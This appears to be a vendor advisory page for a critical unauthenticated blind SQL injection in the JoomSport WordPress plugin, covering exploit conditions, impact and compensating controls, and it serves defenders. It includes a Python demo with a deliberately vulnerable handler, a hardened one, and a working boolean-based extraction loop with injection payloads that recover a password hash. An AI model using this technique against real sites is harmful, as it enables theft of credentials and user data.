CVE-2026-42647 (CRITICAL)
CNA: Patchstack

CVE-2026-42647: WordPress JoomSport plugin <= 5.7.7 - SQL Injection vulnerability

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection. This issue affects JoomSport: from n/a through 5.7.7.

Metrics

CVSS v3.1 base score: 9.3
Severity: CRITICAL
Fixed in: no fixed version published
Affected products: 1


HarborGuard Analysis

Synopsis

The JoomSport WordPress plugin, versions up to and including 5.7.7, contains a SQL injection flaw that an unauthenticated remote attacker can trigger by sending crafted HTTP requests to the affected site. No login or user interaction is required. Successful exploitation gives the attacker blind read access to the WordPress database (the CVSS vector rates confidentiality impact High and integrity impact None), exposing password hashes, stored session-token hashes and all application data, with a lesser potential to degrade database availability through expensive injected queries. No fix version has been published; HarborGuard tracks this advisory and will make a patched-image rebuild available as soon as the upstream maintainer releases one.

HarborGuard Coverage

Detection: Available

Detection is available across every HarborGuard environment: the CVE is ingested from upstream advisory feeds within minutes of publication and matched against customer images, including custom-built WordPress images that bundle the JoomSport plugin. Any image carrying JoomSport at or below version 5.7.7 is flagged automatically.
Triage: Available

HarborGuard scores this vulnerability at CVSS 9.3 (Critical) and weights it further against each environment's compliance policy to determine urgency and routing. Findings are surfaced to the team or inbox designated by each customer org's escalation rules, so the right people see it without manual triage.
Patch: Pending upstream

Because no upstream fix has been published, HarborGuard re-checks this advisory on every ingest cycle and will make a patched-image rebuild available the moment a remediated release appears. In the interim, customers can apply compensating controls through HarborGuard's network-policy recommendations to restrict external access to affected WordPress instances.

Exploit Conditions

  • Network reachability: Required

    The attacker must reach the WordPress site over the network; the vulnerable plugin endpoint is exposed via standard HTTP/HTTPS, so any internet-facing deployment is reachable without any special network position.

  • Authentication: Not required

    No account or session token is needed; the injection point is accessible to unauthenticated requests.

  • Victim interaction: Not required

    The attacker sends crafted requests directly to the server; no user action or click is required to trigger the vulnerability.

  • Attack complexity: Low

    Attack complexity is low (AC:L in the CVSS vector): the exploit is reliable and repeatable, with no dependency on race conditions, memory layout, or other environmental factors.

Blast Radius

  • Reads any data stored in the WordPress database using blind SQL injection techniques, including usernames, hashed passwords, and email addresses for all registered users.
  • Extracts session-token hashes and other authentication metadata from wp_usermeta. WordPress's secret keys and salts live in wp-config.php rather than the database, so they are not exposed by a read-only injection; account takeover therefore usually proceeds by cracking the extracted password hashes offline rather than by replaying a recovered token.
  • Reads custom plugin and application data tables, which may include personally identifiable information, order records, or sports league data managed by JoomSport.
  • Degrades database availability: time-based blind injection relies on functions such as MySQL's SLEEP() or BENCHMARK() that hold a connection open, so a high-volume extraction campaign can exhaust the connection pool and stall the WordPress service (the CVSS vector rates availability impact Low).
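To make the blind read described above concrete, here is an added example that is not JoomSport's code and does not reproduce this CVE: a constructed toy request handler over an in-memory SQLite database, shown in its deliberately vulnerable form beside a hardened form that binds the parameter (the WordPress equivalent is `$wpdb->prepare()`). The `js_teams` table, the `wp_users` row, the handler names and the request counter are all assumptions made for the illustration. The extraction loop is the general boolean-based technique, using a binary search over code points so that about seven yes/no requests recover one byte.

```python
"""Boolean-based blind SQL injection against a constructed toy handler.

Added illustration of read-only blind extraction. It is not JoomSport's code
and does not reproduce the CVE: the schema, rows and request handler are
constructed here on an in-memory SQLite database. The hardened handler binds
the parameter, which is what $wpdb->prepare() does in WordPress.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one WordPress-style user row and a small plugin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$Bsamplehash')")
    conn.execute("CREATE TABLE js_teams (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO js_teams VALUES (?, ?)", [(1, "Lions"), (2, "Tigers")])
    return conn


def vulnerable_team_exists(conn: sqlite3.Connection, team_id: str) -> bool:
    """Deliberately vulnerable: the request parameter is concatenated into SQL."""
    return conn.execute(f"SELECT 1 FROM js_teams WHERE id = {team_id}").fetchone() is not None


def hardened_team_exists(conn: sqlite3.Connection, team_id: str) -> bool:
    """Validate the type, then bind the value; injected SQL never reaches the parser."""
    try:
        bound = int(team_id)
    except ValueError:
        return False
    return conn.execute("SELECT 1 FROM js_teams WHERE id = ?", (bound,)).fetchone() is not None


def extract_via_oracle(oracle, column: str, table: str, max_len: int = 64) -> tuple[str, int]:
    """Recover one string value through a yes/no oracle.

    For each character position a binary search over code points 0..127 asks
    'is the code point greater than mid?'. Past the end of the string substr()
    yields '' and unicode('') is NULL in SQLite, so every comparison is false,
    the search converges on 0 and the loop stops. Returns (value, requests).
    """
    recovered, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (f"1 AND unicode(substr((SELECT {column} FROM {table} LIMIT 1),"
                       f"{pos},1)) > {mid}")
            requests += 1
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        recovered += chr(lo)
    return recovered, requests


def run_demo() -> dict:
    """Run the extraction against both handlers and report what each leaks."""
    conn = make_db()
    vuln = lambda p: vulnerable_team_exists(conn, p)
    safe = lambda p: hardened_team_exists(conn, p)
    login, n_login = extract_via_oracle(vuln, "user_login", "wp_users")
    pw_hash, _ = extract_via_oracle(vuln, "user_pass", "wp_users")
    blocked, _ = extract_via_oracle(safe, "user_login", "wp_users")
    return {"login": login, "login_requests": n_login,
            "password_hash": pw_hash, "hardened_result": blocked}


if __name__ == "__main__":
    print(run_demo())
```

The recovered password hash is what the "cracking offline" step in the list above works on; nothing in this exchange writes to the database, matching the vector's I:N. Against the hardened handler the same payloads are rejected at the type check, so the oracle never answers yes and the extraction returns an empty string.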

How HarborGuard Handles This

Available on HarborGuard: this CVE is matched against every customer image that includes the JoomSport plugin at or below version 5.7.7, with findings scored at Critical (CVSS 9.3) and routed per each org's compliance policy. Because no upstream patch exists at this time, HarborGuard monitors the Patchstack advisory feed on every ingest cycle and, the moment a fix version is published, will generate a patched-image rebuild and, for customers with auto-remediation enabled, open a PR against affected workloads. While awaiting the upstream fix, compensating controls reduce exposure without a code-level patch: Kubernetes or cloud network policies that restrict inbound HTTP traffic to trusted sources; disabling or feature-flag-gating the JoomSport plugin in non-essential environments, which removes the injection point entirely; and egress filtering to contain follow-on lateral movement from a compromised host. Egress filtering does not, however, prevent data loss through this flaw itself, because a blind injection returns its answers inside ordinary HTTP responses or their timing, so restricting inbound reachability or disabling the plugin is the control that actually closes the read path.

Affected packages

  • Beardev / JoomSport, versions ≤ 5.7.7
CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Decoded: network attack vector, low complexity, no privileges or user interaction required, scope changed, confidentiality impact High, integrity impact None, availability impact Low. These values give the 9.3 base score shown above.